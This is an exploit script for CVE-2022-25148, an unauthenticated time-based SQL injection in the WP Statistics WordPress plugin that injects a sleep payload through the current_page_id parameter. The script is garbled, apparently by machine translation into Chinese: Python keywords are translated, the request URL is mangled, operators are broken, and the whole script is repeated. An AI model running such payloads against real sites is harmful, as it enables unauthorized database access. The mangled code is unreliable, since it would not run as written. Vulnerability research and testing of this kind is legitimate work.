#Exploit Title: WP统计插件=13.1.5 Current_Page_ID-基于时间的SQL注入(未经身份验证)
#日期: 13/02/2022
#利用作者: Psychosechosherlock
#供应商HomePage: https://wp-statistics.com/
#软件link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
#版本: 13.1.5和先验
#测试在: WP统计数据13.1.5
#CVE : CVE-2022-25148
#供应商URL: https://wordpress.org/plugins/wp-statistics/
#CVSS得分: 8.4(高)
导入argparse
导入请求
导入
导入Urllib.Parse
def main():
parser=argparse.argumentparser(Description='CVE-2022-25148')
parser.add_argument(' - u',' - url',必需=true,
help='WordPress Base URL')
args=parser.parse_args()
baseurl=args.url
有效载荷='if(1=1,睡眠(5),1)'
wp_session=requests.session()
resp=wp_session.get(baseurl)
nonce=re.search(r'_wpnonce=(。*?)wp_statistics_hit',desp.text).group(1)
打印(f'gathered nonce: {nonce}')
标题={
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 12_2_1)AppleWebkit/605.1.15(Khtml,像Gecko一样)版本/15.2 Safari/605.1.15'}
有效载荷=urllib.parse.quote_plus(有效载荷)
exploit=f'/wp-json/wp-statistics/v2/hit?_=11_wpnonce={nonce} wp_statistics_hit_rest=browser=platform=platform=platform=platform=version=wordyred=referred=ip=ip=11.11.11.11.11 exclusion_m atch=noexclusion_reasonUa=tothatrack_all=1timestamp=11current_page_type=homecurrent_page_id={pareload} search_querypage_uri=/user_id=0''''
exploit_url=baseurl + exploit
打印(f'\ nsending: {exploit_url}')
resp=wp_session.get(exploit_url,标头=标题)
如果float(resp.elapsed.total_seconds())=5.0:
打印('\ n !目标是脆弱的!')
print(f'\ ntime tate: {resp.elapsed.total_seconds()}')
其他:
打印(“目标不脆弱”)
如果name=='__ -Main __':
主要的()
#日期: 13/02/2022
#利用作者: Psychosechosherlock
#供应商HomePage: https://wp-statistics.com/
#软件link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
#版本: 13.1.5和先验
#测试在: WP统计数据13.1.5
#CVE : CVE-2022-25148
#供应商URL: https://wordpress.org/plugins/wp-statistics/
#CVSS得分: 8.4(高)
导入argparse
导入请求
导入
导入Urllib.Parse
def main():
parser=argparse.argumentparser(Description='CVE-2022-25148')
parser.add_argument(' - u',' - url',必需=true,
help='WordPress Base URL')
args=parser.parse_args()
baseurl=args.url
有效载荷='if(1=1,睡眠(5),1)'
wp_session=requests.session()
resp=wp_session.get(baseurl)
nonce=re.search(r'_wpnonce=(。*?)wp_statistics_hit',desp.text).group(1)
打印(f'gathered nonce: {nonce}')
标题={
'用户代理:'Mozilla/5.0(Macintosh; Intel Mac OS X 12_2_1)AppleWebkit/605.1.15(Khtml,像Gecko一样)版本/15.2 Safari/605.1.15'}
有效载荷=urllib.parse.quote_plus(有效载荷)
exploit=f'/wp-json/wp-statistics/v2/hit?_=11_wpnonce={nonce} wp_statistics_hit_rest=browser=platform=platform=platform=platform=version=wordyred=referred=ip=ip=11.11.11.11.11 exclusion_m atch=noexclusion_reasonUa=tothatrack_all=1timestamp=11current_page_type=homecurrent_page_id={pareload} search_querypage_uri=/user_id=0''''
exploit_url=baseurl + exploit
打印(f'\ nsending: {exploit_url}')
resp=wp_session.get(exploit_url,标头=标题)
如果float(resp.elapsed.total_seconds())=5.0:
打印('\ n !目标是脆弱的!')
print(f'\ ntime tate: {resp.elapsed.total_seconds()}')
其他:
打印(“目标不脆弱”)
如果name=='__ -Main __':
主要的()